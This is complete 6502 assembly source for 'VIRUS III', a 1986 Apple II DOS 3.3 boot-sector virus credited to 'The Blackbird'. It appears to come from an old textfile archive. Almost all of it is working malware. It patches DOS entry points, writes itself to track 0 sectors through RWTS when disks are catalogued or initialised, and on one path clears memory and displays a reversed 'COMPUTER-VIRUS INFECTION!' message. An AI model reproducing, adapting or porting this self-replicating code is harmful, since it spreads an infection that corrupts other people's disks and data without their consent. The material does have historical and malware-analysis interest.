**********************
*                    *
*     VIRUS III      *
*                    *
*     18-FEB-86      *
*                    *
*  BY THE BLACKBIRD  *
*                    *
**********************
*
 ORG $9B00
*
FLAG EQU $9B00-1
SAVEAREA EQU $9B00-11
*
ORIGIN JMP $9D84
 JMP INIT
 JMP MAXFILES
 JSR CATALOG
BOOT1 LDY #$08
 JSR WRT9D00
BOOT2 JSR NORM9D84
BOOTZ LDX #$02
LSAV LDA $A54F,X
 STA SAVEAREA,X
 LDA $A7D4,X
 STA SAVEAREA+3,X
 LDA $ADA8,X
 STA SAVEAREA+6,X
 DEX
 BPL LSAV
 STX FLAG
 JSR PATCHDOS
 BMI ORIGIN ;ALWAYS
CRASH LDY #$02
 JSR WRT9D00
 BCS BOOTZ
 LDX #$02
L9D84 LDA ORIGIN,X
 STA $9A00-3,X
 DEX
 BPL L9D84
 INX
 TXA
BUFCLR STA $9A00,X
 INX
 BNE BUFCLR
 LDX #$9A
 LDY #$0B
 JSR WRITE
 BCS BOOTZ
 LDA #$FD
 LDX #$99
 LDY #$0A
 JSR WRITE
 BCS BOOTZ
 BIT $C082
 LDA #$FA
 STA $03F3
 PHA
 LDA #$62
 STA $03F2
 PHA
 JSR $FB6F ;SETPWR
 JSR $FB60 ;STITLE
 LDA #$07
 STA $20
 LDA #$0A
 STA $25
 LDX #MSGEND-MSG
PRINTMSG LDA MSG,X
 BMI SKIP
 ORA #$80
 JSR $FBFD ;VIDOUT
SKIP DEX
 BPL PRINTMSG
 LDY #$00
 STY $3C
 STY $3E
 STY $42
 LDX #$9A
 STX $3D
 INX
 STX $43
 LDX #$BF
 STX $3F
 JMP $FE2C ;MOVE
INIT LDY #$02
 JSR NORMDOS
 JSR $A54F
 JMP WRTDOS
MAXFILES JSR PATCHDOS
 LDA #$80
 LDX #$9A
 STA $40
 STX $41
 LDX $AA57
 DEX
 BNE MAXISOK
 INX
MAXISOK STX $AA63
 JMP $A7E5
CATALOG LDA #$16
 STA $B39D
 JSR WRTDOS
 JMP $AE2F
NORM9D84 LDY #$02
STA9D84 LDX #$02
LNORM LDA LDAB7E9,Y
 STA $9D84,X
 DEY
 DEX
 BPL LNORM
 RTS
CMPB4BB LDX #$02
LCMP LDA LDAB7E9,Y
 CMP $B4BB+$84,X
 BNE RTS1
 DEY
 DEX
 BPL LCMP
 INX
RTS1 RTS
PATCHDOS LDY #$10
NORMDOS LDX #$02
LSTORE LDA BUFADR-1,Y
 STA $9D00-1,X
 LDA SAVEAREA,Y
 STA $A54F,X
 LDA SAVEAREA+3,Y
 STA $A7D4,X
 LDA SAVEAREA+6,Y
 STA $ADA8,X
 DEY
 DEX
 BPL LSTORE
 RTS
SETPARMS STA $B7F0 ;BUFL
 STX $B7F1 ;BUFH
 STY $B7ED ;SECTOR
 LDX #$00
 STX $B7EB ;VOLUME
 STX $B7EC ;TRACK
 STX $B7F2 ;BYTEL
 STX $B7F3 ;BYTEH
 LDY #$E8
 LDA #$B7
 LDX #$02
RTS2 RTS
WRTCBA LDX #$02
LSTA LDA LDAB7E9,Y
 STA $B4BB+$84,X
 DEY
 DEX
 BPL LSTA
 LDA #$BB
 LDX #$B4
 LDY #$0C
 JSR WRITE
 BCS RTS2
 LDA #$00
 LDX #$9C
 LDY #$0B
 JSR WRITE
 BCS RTS2
 LDA #$00
 LDX #$9B
 LDY #$0A
WRITE JSR SETPARMS
RWTS STX $B7F4 ;CMD
 JMP $B7B5 ;RWTS
WRT9D00 JSR STA9D84
 LDA #$00
 LDX #$9D
 LDY #$0C
 BNE WRITE ;ALWAYS
WRTDOS JSR PATCHDOS
 LDA #$BB
 LDX #$B4
 LDY #$0C
 JSR SETPARMS
 DEX
 JSR RWTS
 BCS RTS3
 LDY #$02
 JSR CMPB4BB
 BEQ WRTZ
 BIT FLAG
 BMI RTS3
 LDY #$08
 JSR CMPB4BB
 BNE RTS3
 LDY #$0B
 JSR WRTCBA
 BCS RTS3
 SEC
 BCS RORFLAG ;ALWAYS
WRTZ LDY #$05
 JSR WRTCBA
 BCS RTS3
RORFLAG ROR FLAG
RTS3 LDX #$00
 TXA
LCLR STA $B4BB,X
 INX
 BNE LCLR
 RTS
BUFADR DA $9CD3
LDAB7E9 LDA $B7E9
 JMP BOOT1
 JMP BOOT2
 JMP CRASH
 DA $9A80
MSG ASC 'DRIBKCALB EHT YB 68-B'
AT9CD3 HEX 00
 ASC 'EF-81'
 HEX 0D0D
 ASC '! NOITCEFNI SURIV-RETU'
AT9CF1 DA $9CA6
 DA $9BA6
 DA $9AA6
 DA $9A80
 ASC 'PMOC'
MSGEND HEX 0D0000
----------------------------------

Textfile T.VIRUS2
